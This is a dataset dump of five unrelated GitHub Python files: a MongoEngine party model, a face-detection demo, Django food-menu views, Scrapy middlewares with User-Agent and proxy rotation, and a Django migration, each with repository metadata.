5aff8eeaf3871181bde40cf06cdc1e1796769831 | 44632954ff66bc603851f7d5d64a720326324dfe | /party/models.py | 9e43be5b94bac07e1f18d7596e658c9149306e8b | [] | no_license | yangliclai/partygo | 95ff8f0e298a5ae5c3e2d8d5ffe86f1038048bf6 | 54f7c320a35e6d58fd8bb2fd2d882abe646df1e1 | refs/heads/master | 2020-03-18T22:52:54.304965 | 2018-05-31T04:44:15 | 2018-05-31T04:44:15 | 135,371,011 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | from application import db
from user.models import User
class Party(db.Document):
name = db.StringField(required=True)
place = db.StringField(required=True)
location = db.PointField(required=True)
start_datetime = db.DateTimeField(required=True)
end_datetime = db.DateTimeField(required=True)
party_photo = db.StringField()
description = db.StringField(min_length=50,required=True)
host = db.ObjectIdField(required=True)
cancel = db.BooleanField(default=False)
attendees = db.ListField(db.ReferenceField(User)) | [
"yangliclai@gmail.com"
] | yangliclai@gmail.com |
62b098b0cfa04bde31dd06873998aa6dfb5082de | 83ad3bfdc3fa5e5b657dff7cd386789b2c6478dd | /face_detection_fr_hog.py | fb0cd44499f5c8840030677171b65aad2703c976 | [] | no_license | amombofortune/Face-detection-with-OpenCV | 7a0af5b99b3851a6a8b779a2949c5c9307cf6bed | 50ba4787d18a9d8f5d14441bf9e11beeb45390aa | refs/heads/main | 2023-07-11T21:39:53.458345 | 2021-07-05T08:10:35 | 2021-07-05T08:10:35 | 383,062,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,558 | py | """
Face detection using face_recognition HOG face detector
"""
import cv2
import face_recognition
from matplotlib import pyplot as plt
def show_img_with_matplotlib(color_img, title, pos):
""" Show an image using matplotlib capabilities """
img_RGB = color_img[:, :, ::-1]
ax = plt.subplot(1, 2, pos)
plt.imshow(img_RGB)
plt.title(title)
plt.axis("off")
def show_detection(image, faces):
""" Draws a rectangle over each detected face """
for face in faces:
top, right, bottom, left = face
cv2.rectangle(image, (left, top), (right, bottom), (255, 0, 0), 10)
return image
#Load image
img = cv2.imread("id_sample.png")
#Convert the image from BGR (which openCV uses) to RGB (which face_recognition uses)
rgb = img[:, :, ::-1]
#Peform face detection using face_recognition (internally calls dlib HOG face detector)
rects_1 = face_recognition.face_locations(rgb, 0, "hog")
rects_2 = face_recognition.face_locations(rgb, 1, "hog")
#Draw face detections
img_faces_1 = show_detection(img.copy(), rects_1)
img_faces_2 = show_detection(img.copy(), rects_2)
#Create the dimensions of the figure and set title
fig = plt.figure(figsize=(10, 4))
plt.suptitle("Face detection using face_recognition", fontsize = 14, fontweight = 'bold')
fig.patch.set_facecolor('silver')
#Plot the images
show_img_with_matplotlib(img_faces_1, "face_locations(rgb, 0, hog): " + str(len(rects_1)), 1)
show_img_with_matplotlib(img_faces_1, "face_locations(rgb, 1, hog): " + str(len(rects_2)), 2)
#Show the figure
plt.show()
| [
"82210852+amombofortune@users.noreply.github.com"
] | 82210852+amombofortune@users.noreply.github.com |
194af4a318b3024867f3c0710f450671889ab563 | e81e8a033e38bc0d46d58e7ee7e33e77d3242d57 | /Food/views.py | 1602bf914418ee1b214fd25e923ae8d15e50b801 | [] | no_license | vthdat/-Django-WebsiteCanTinProject | 116530efd959a3e6563a6e43a22cff8992d3d9b2 | 76fefcd1ed7c4acced3976abd80c4e4d711a567c | refs/heads/master | 2023-07-30T06:42:10.789337 | 2020-07-16T18:39:04 | 2020-07-16T18:39:04 | 277,478,650 | 0 | 0 | null | 2021-09-22T19:31:17 | 2020-07-06T07:57:31 | JavaScript | UTF-8 | Python | false | false | 2,936 | py | from django.shortcuts import render, redirect, get_object_or_404
from django.views.generic import ListView, DetailView
from .models import Food
from cart.forms import CartAddFoodForm
from cart.cart import Cart
# Create your views here.
class FoodListView(ListView):
model = Food
template_name = 'food_list.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['beverage_list'] = Food.objects.filter(food_type='BE')
context['breakfast_list'] = Food.objects.filter(food_type='BR')
context['lunch_list'] = Food.objects.filter(food_type='LU')
context['dinner_list'] = Food.objects.filter(food_type='DI')
context['snack_list'] = Food.objects.filter(food_type='SN')
context['cart_product_form'] = CartAddFoodForm()
return context
class FoodDetailView(DetailView):
model = Food
template_name = 'food_detail.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['food_list'] = Food.objects.filter(food_type=self.object.food_type).exclude(id=self.object.id)
context['cart_product_form'] = CartAddFoodForm()
return context
class FoodBreakfastListView(ListView):
model = Food
template_name = 'custom_food_list.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['food_list'] = Food.objects.filter(food_type='BR')
context['cart_product_form'] = CartAddFoodForm()
return context
class FoodLunchListView(ListView):
model = Food
template_name = 'custom_food_list.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['food_list'] = Food.objects.filter(food_type='LU')
context['cart_product_form'] = CartAddFoodForm()
return context
class FoodDinnerListView(ListView):
model = Food
template_name = 'custom_food_list.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['food_list'] = Food.objects.filter(food_type='DI')
context['cart_product_form'] = CartAddFoodForm()
return context
class FoodBeverageListView(ListView):
model = Food
template_name = 'custom_food_list.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['food_list'] = Food.objects.filter(food_type='BE')
context['cart_product_form'] = CartAddFoodForm()
return context
class FoodSnackListView(ListView):
model = Food
template_name = 'custom_food_list.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['food_list'] = Food.objects.filter(food_type='SN')
context['cart_product_form'] = CartAddFoodForm()
return context
| [
"vd.thanhdat@gmail.com"
] | vd.thanhdat@gmail.com |
e781738d385aeb71213da6c16ad550345f8a5af5 | 71c1ce0ef45aee12066a56b4e7bf2f5d8a95f9c2 | /foodsecurity/foodsecurity/middlewares.py | b82601c0976a812927e51fdf9926cabe5bd76ff0 | [] | no_license | chengchaoccss/crawlproject | 4c26f8255f62e9099f084fb32ef7bd045c84a11c | 7bb02d8314492ed7221ef6054e2b7f1a0bc15a3a | refs/heads/master | 2021-01-05T03:58:21.392217 | 2020-02-17T09:29:17 | 2020-02-17T09:29:17 | 240,871,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,029 | py | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
import random
class FoodsecuritySpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Request, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class FoodsecurityDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class UserAgentDownloadMiddleware(object):
USER_AGENTS=[
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0",
"Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
]
def process_request(self,request,spider):
user_agent=random.choice(self.USER_AGENTS)
request.headers['User-Agent']=user_agent
class IpproxyDownloadMiddleware(object):
PROXIES = '''
58.218.92.157:19220
58.218.214.132:19264
58.218.92.87:17595
58.218.214.152:15911
183.161.228.148:4351
58.218.214.150:15894
101.205.147.33:4332
58.218.92.30:15020
58.218.214.142:16198
110.241.197.210:4367
58.218.92.81:13120
111.75.38.43:4376
114.233.8.244:4336
58.218.92.157:18509
58.218.214.137:19357
58.218.214.158:16592
112.83.142.48:4331
58.218.214.149:15834
58.218.214.136:17019
58.218.214.133:15155'''
PROXIES =PROXIES.split()
def process_request(self,request,spider):
proxy = random.choice(self.PROXIES)
request.meta["proxy"]="http://"+proxy | [
"Alfred_CC@outlook.com"
] | Alfred_CC@outlook.com |
18e73ec24b79d119113170322f4767f8acfe8a9d | c1e93f2110db91b22609762aa1c9cfcf608c0975 | /music/migrations/0011_auto_20200524_1957.py | 6f544b80b074449c1e56729154243316ae5072bb | [] | no_license | eliyajoseph7/music_app | 6f49979726b65cc9b664602acd263d2b787128b0 | 802780e6186f7cd3ba27a4b1c21f09f701c7cb1e | refs/heads/master | 2022-07-04T22:54:22.775210 | 2020-05-24T19:44:38 | 2020-05-24T19:44:38 | 264,457,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | # Generated by Django 3.0.2 on 2020-05-24 16:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('music', '0010_aboutme'),
]
operations = [
migrations.RenameField(
model_name='aboutme',
old_name='hobby',
new_name='accomplish',
),
migrations.RemoveField(
model_name='aboutme',
name='skills',
),
migrations.AddField(
model_name='aboutme',
name='experiance',
field=models.TextField(default='', null=True),
),
migrations.AddField(
model_name='aboutme',
name='work',
field=models.TextField(default='', null=True),
),
]
| [
"exaveryeliya20@gmail.com"
] | exaveryeliya20@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.